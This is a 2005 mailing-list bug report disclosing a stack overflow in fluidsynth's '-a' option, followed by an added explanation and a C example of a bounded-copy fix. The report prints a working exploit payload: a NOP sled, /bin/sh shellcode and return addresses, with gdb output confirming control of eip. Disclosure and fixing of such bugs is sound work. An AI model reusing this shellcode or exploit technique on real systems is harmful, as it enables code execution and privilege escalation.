[fluid-dev] Bug Report: -a overflow
From: Axioplase
Subject: [fluid-dev] Bug Report: -a overflow
Date: Mon, 07 Feb 2005 18:07:31 +0100
User-agent: Mozilla Thunderbird 0.8 (X11/20040926)
fluidsynth can be exploited through an overflow when passing an argument
to the "-a" option.
See attached bug report.
Though there isn't a big risk that fluidsynth is suid root, that's a bug
anyway...
Axioplase.
--
<PaXaL2> wireless mice are a pain
<PaXaL2> I've lost it
$ uname -a 17:55
FreeBSD XXX.YYY 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC
2004 address@hidden:/usr/obj/usr/src/sys/GENERIC i386
$ fluidsynth --version 17:55
fluidsynth 1.0.3
$fluidsynth -a `perl -e 'print "A"x500'`
segmentation fault (core dumped) fluidsynth -a `perl -e 'print "A"x500'`
$gdb -core fluidsynth.core
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software
Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd".
Core was generated by `fluidsynth'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) info reg
eax 0x41414141 1094795585
ecx 0x0 0
edx 0x280c623e 671900222
ebx 0x280c56a4 671897252
esp 0xbfbfe6cc 0xbfbfe6cc
ebp 0x280c5020 0x280c5020
esi 0x1 1
edi 0x280c6020 671899680
eip 0x41414141 0x41414141
eflags 0x10292 66194
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x97 151
$ fluidsynth -a `./expl.pl 578 0`
using adress 0xbfbfeb50
using exploit
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x17\x5e\x31\xc0\x50\x88\x
46\x07\x89\x46\x08\x89\xf7\xb0\x08\x01\xc7\x57\x56\xb0\x3b\x50\xcd\x80\xe8\xe4\x
ff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x90\x90\x90\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\xbf\xbf\x50\xeb\x
bf\xbf
$ echo exploit worked > r00ted
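The report above shows the classic symptom of an unbounded copy of a command-line argument into a fixed-size stack buffer: the 500 "A" bytes passed to -a overrun the buffer and the saved return address, so the process resumes at eip = 0x41414141 ("AAAA") and faults. The example below is an added illustration of the fix for that bug class, not fluidsynth's own code; the field size DRIVER_NAME_MAX, the function names and the constructed inputs are assumptions made for the demonstration. The setter refuses any argument that would not fit, including its terminating NUL, and leaves the destination untouched instead of writing past it.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical fixed-size field for the audio driver name given with "-a".
 * The size is an assumption for this example, not a value from fluidsynth. */
#define DRIVER_NAME_MAX 32

/* Store `arg` into dst[dstlen] only if it fits with its NUL terminator.
 * Returns 0 on success, -1 when the input is rejected. The length scan is
 * bounded by dstlen, so an over-long or unterminated argument is never
 * read past the point where it is already known not to fit, and the
 * destination is never written on the rejection path. */
int set_driver_name(char *dst, size_t dstlen, const char *arg)
{
    if (dst == NULL || arg == NULL || dstlen == 0)
        return -1;

    size_t n = 0;
    while (n < dstlen && arg[n] != '\0')
        n++;
    if (n == dstlen)            /* no NUL within the space available */
        return -1;

    memcpy(dst, arg, n);
    dst[n] = '\0';
    return 0;
}

/* Constructed input: `len` copies of 'A', mirroring the perl -e 'print "A"x500'
 * reproduction in the report. Returns the set_driver_name() result. */
int try_name_of_length(size_t len)
{
    char field[DRIVER_NAME_MAX];
    char *arg = malloc(len + 1);
    if (arg == NULL)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    int rc = set_driver_name(field, sizeof field, arg);
    free(arg);
    return rc;
}

/* Returns 1 if `name` is accepted and stored unchanged, else 0. */
int roundtrips(const char *name)
{
    char field[DRIVER_NAME_MAX];
    if (set_driver_name(field, sizeof field, name) != 0)
        return 0;
    return strcmp(field, name) == 0;
}

int main(void)
{
    printf("short name accepted: %d\n", roundtrips("oss"));
    printf("31 bytes: rc=%d\n", try_name_of_length(31));   /* fits: 31 + NUL */
    printf("32 bytes: rc=%d\n", try_name_of_length(32));   /* rejected */
    printf("500 bytes: rc=%d\n", try_name_of_length(500)); /* rejected */
    return 0;
}
```

In a real option parser the rejection path should also print the accepted limit to stderr and exit non-zero, so that a misconfigured launcher fails loudly rather than silently truncating the driver name; the stack-protector and non-executable-stack mitigations available on modern toolchains are a second line of defence, not a substitute for the length check.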